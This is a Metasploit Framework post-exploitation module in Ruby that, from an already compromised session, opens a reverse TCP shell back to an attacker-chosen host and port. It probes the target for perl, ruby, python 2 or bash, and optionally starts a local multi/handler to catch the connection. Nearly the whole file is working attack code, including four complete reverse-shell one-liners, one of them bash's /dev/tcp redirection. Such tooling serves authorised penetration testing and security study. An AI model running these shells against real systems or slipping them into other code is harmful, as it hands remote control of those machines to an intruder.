GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/manage/system_session.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
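class MetasploitModule < Msf::Post

  # Post module: from an existing session, launch a reverse TCP shell using an
  # interpreter that is already present on the target (perl, ruby, python 2 or
  # bash) and optionally start a local exploit/multi/handler to receive it.
  #
  # All target interaction goes through cmd_exec on the current session, so the
  # interpreter one-liner shows up on the target as a child process of that
  # session, with LHOST and LPORT embedded in its command line.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Manage System Remote TCP Shell Session',
        'Description' => %q{
          This module will create a Reverse TCP Shell on the target system
          using the system's own scripting environments installed on the
          target.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
        'Platform' => %w[linux osx unix],
        'SessionTypes' => [ 'meterpreter', 'shell' ]
      )
    )
    register_options(
      [
        OptAddressLocal.new('LHOST',
                            [true, 'IP of host that will receive the connection from the payload.']),
        OptInt.new('LPORT',
                   [false, 'Port for Payload to connect to.', 4433]),
        OptBool.new('HANDLER',
                    [ true, 'Start an exploit/multi/handler to receive the connection', false]),
        OptEnum.new('TYPE', [
          true, 'Scripting environment on target to use for reverse shell',
          'auto', ['auto', 'ruby', 'python', 'perl', 'bash']
        ])
      ]
    )
  end

  # Entry point for the `run` command.
  #
  # Optionally starts the local handler first (so the connect-back has a
  # listener to reach), builds the one-liner selected by TYPE, and executes it
  # on the target in the background. An exception raised while probing the
  # target or building the command is reported instead of being swallowed, so
  # an empty command can no longer be mistaken for a successful no-op.
  def run
    lhost = datastore['LHOST']
    lport = datastore['LPORT']
    create_multihand(lhost, lport) if datastore['HANDLER']

    cmd = begin
      case datastore['TYPE']
      when /auto/i then auto_create_session(lhost, lport)
      when /ruby/i then ruby_session(lhost, lport)
      when /python/i then python_session(lhost, lport)
      when /perl/i then perl_session(lhost, lport)
      when /bash/i then bash_session(lhost, lport)
      else ''
      end
    rescue StandardError => e
      print_error("Failed to build the reverse shell command: #{e.class}: #{e.message}")
      ''
    end
    return if cmd.empty?

    print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")
    # Run in a backgrounded subshell so cmd_exec returns instead of blocking
    # on the long-lived shell process.
    cmd_exec("(#{cmd} &)")
  end

  # Probes the target for a usable interpreter, in the order perl, ruby,
  # python 2, bash, and returns the one-liner for the first one found.
  # Returns '' (after printing an error) when none of the probes match.
  #
  # Each probe is a version-banner check over cmd_exec; the per-interpreter
  # builder repeats the same check, so a found interpreter is probed twice.
  def auto_create_session(lhost, lport)
    probes = [
      ['perl -v', /Larry/, 'Perl', :perl_session],
      ['ruby -v', /revision/i, 'Ruby', :ruby_session],
      ['python -V', /Python 2\.(\d)/, 'Python', :python_session],
      ['bash --version', /GNU bash/, 'Bash', :bash_session]
    ]

    probes.each do |probe, banner, label, builder|
      next unless cmd_exec(probe) =~ banner

      print_status("#{label} was found on target")
      cmd = public_send(builder, lhost, lport)
      vprint_status("Running #{cmd}")
      return cmd
    end

    print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')
    ''
  end

  # Checks whether a multi/handler job is already listening on lhost:lport.
  # Returns true (and prints the conflicting job id) when one is, false
  # otherwise; used to avoid binding a second handler to the same port.
  # (Name kept as-is for compatibility; the spelling is historical.)
  def check_for_listner(lhost, lport)
    conflict = false
    client.framework.jobs.each do |_k, j|
      next unless j.name =~ %r{ multi/handler}

      current_lhost = j.ctx[0].datastore['LHOST']
      current_lport = j.ctx[0].datastore['LPORT']
      next unless lhost == current_lhost && lport == current_lport.to_i

      print_error("Job #{j.jid} is listening on IP #{current_lhost} and port #{current_lport}")
      conflict = true
    end
    conflict
  end

  # Starts an exploit/multi/handler job for generic/shell_reverse_tcp on
  # lhost:lport, unless a handler already listens there (see
  # check_for_listner), in which case an error is printed and nothing starts.
  def create_multihand(lhost, lport)
    pay = client.framework.payloads.create('generic/shell_reverse_tcp')
    pay.datastore['LHOST'] = lhost
    pay.datastore['LPORT'] = lport
    print_status('Starting exploit/multi/handler')

    if check_for_listner(lhost, lport)
      print_error('Could not start handler!')
      print_error('A job is listening on the same Port')
      return
    end

    # Configure the handler module to share the payload's datastore.
    mul = client.framework.exploits.create('multi/handler')
    mul.share_datastore(pay.datastore)
    mul.datastore['WORKSPACE'] = client.workspace
    mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
    mul.datastore['EXITFUNC'] = 'thread'
    # Keep the handler running after the first session so it can be reused.
    mul.datastore['ExitOnSession'] = false
    # Validate module options before launching.
    mul.options.validate(mul.datastore)
    # Run as a background job, echoing output to the console.
    mul.exploit_simple(
      'Payload' => mul.datastore['PAYLOAD'],
      'LocalInput' => user_input,
      'LocalOutput' => user_output,
      'RunAsJob' => true
    )
  end

  # Perl reverse TCP shell one-liner (forks, connects to lhost:lport and
  # ties STDIN/STDOUT to the socket). Returns '' with an error printed when
  # `perl -v` does not respond with a Perl banner.
  def perl_session(lhost, lport)
    unless cmd_exec('perl -v') =~ /Larry/
      print_error('No scripting environment found for the selected type.')
      return ''
    end

    print_status('Perl reverse shell selected')
    "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \
      "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
  end

  # Ruby reverse TCP shell one-liner (forks, connects with TCPSocket and
  # runs each received line through IO.popen). Returns '' with an error
  # printed when `ruby -v` does not respond with a Ruby banner.
  def ruby_session(lhost, lport)
    unless cmd_exec('ruby -v') =~ /revision/i
      print_error('No scripting environment found for the selected type.')
      return ''
    end

    print_status('Ruby reverse shell selected')
    "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \
      "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
  end

  # Python 2 reverse TCP shell one-liner (connects, dup2s the socket over fds
  # 0-2 and execs an interactive /bin/sh). The probe deliberately matches
  # only a "Python 2.x" banner. Returns '' with an error printed otherwise.
  def python_session(lhost, lport)
    unless cmd_exec('python -V') =~ /Python 2\.(\d)/
      print_error('No scripting environment found for the selected type.')
      return ''
    end

    print_status('Python reverse shell selected')
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \
      "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \
      "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
  end

  # Bash reverse TCP shell one-liner using bash's /dev/tcp pseudo-device,
  # detached with nohup. Returns '' with an error printed when
  # `bash --version` does not respond with a GNU bash banner.
  def bash_session(lhost, lport)
    unless cmd_exec('bash --version') =~ /GNU bash/
      print_error('No scripting environment found for the selected type.')
      return ''
    end

    print_status('Bash reverse shell selected')
    "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
  end
end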